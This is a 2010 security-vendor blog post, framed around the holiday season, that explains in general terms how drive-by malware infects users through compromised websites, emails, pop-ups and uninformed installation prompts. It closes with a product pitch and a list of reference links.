Drive-by malware—just when you thought it was safe to surf the Internet
By Will Gragido CISSP CISA NSA-IAM / IEM, Digital Vaccine Labs, HP TippingPoint
Season’s Greetings and Warnings…
Happy Holidays! In this season, we are often reminded to give thanks for what we have in the form of friends, family and opportunity while wishing good tidings to those near and far. We’re encouraged to celebrate and share our good cheer with the masses and our money with the retailers. It’s a huge time of year for retailers—cyber or otherwise—as it dictates much of what they might expect for coming calendar year in terms of business profit and revenue.
Unfortunately, this also makes this an incredibly popular time of year for advanced malicious code and content infections to spread to unsuspecting masses, wreaking havoc and chaos in homes and businesses the world over.
At this point you may be asking: Why in 2010 should surfing the Internet with legitimate intent—as opposed to doing so with questionable intent—pose such great risk? It’s a reasonable question to ask, especially given how common rudimentary security solutions are on computing platforms today. Yet regardless of the ubiquitous nature of security solutions on computing platforms, great risk still exists.
How the Hackers stole Christmas
As we’ve discussed in previous posts, the concept of malicious code and content is an elusive one, despite the steady stream of material that is promoted via media channels—whether online, print or televised etc. Establishing the who, what, where, when, why or how is not trivial.
Few threats demonstrate this as accurately as the drive-by malware infection. Drive-by malware or downloads are essentially unintentional downloads of software (typically malicious and not-trusted) from a site on the Internet. Though it’s easy to believe that the sites in question are malicious, the fact is that in most cases the sites are not malicious but have been compromised.
Typically these downloads fall into one of the following categories
1. Simple web surfing & email communication
- Surfing onto a compromised website which
contains malicious code & content - Reading a compromised email or email attachment
which executes an infection - Dismissing a pop-up that in fact triggers a download
2. Uninformed authorization
- User authorizes the installation of a piece of code not
fully understanding the consequences of his
or her actions - Example: User surfs onto site, a download and
installation request for an application initiates (could
be Active X or Java applet or some other application),
authorization is granted and as a result infection occurs
which sees, via obfuscation and redirection compromise
of the system. (In cases such as these there is often
a “fee” for removal of a given piece of code provided a
users system protection is either incapable of removing
it, didn’t detect it as a threat or was by-passed by the
users authorization.)
Be cautious...and be of good cheer
The implication of such comprises range greatly. The net effect of such activity can and often is extremely serious, manifesting in various forms of personal, professional, financial and geo-political compromise. As a result, users should take every possible precaution at their disposal—from the technological to the theoretical—to minimize the risks and maximize the holiday cheer.
‘Tis the season to learn more
Leverage the power of the Instant-On Enterprise to protect and defend your business. Learn how Enterprise Security becomes your infrastructure guardian, protecting you from suspicious emails, malicious attacks and zero-day vulnerability exploits.
For more information on drive-by malware downloads and infections, please refer to the following:
- http://www.cc.gatech.edu/grads/l/long/download/BLA
DE-CCS10-slides.pdf - http://www.malwarehelp.org/methods-of-infection.ht
ml - http://www.networkworld.com/newsletters/techexec/2
008/0303techexec1.html - http://www.zdnet.com/blog/security/microsoft-expos
es-firefox-users-to-drive-by-malware-downloads/461 ... - http://www.armorize.com/index.php?link_id=whitepap
er
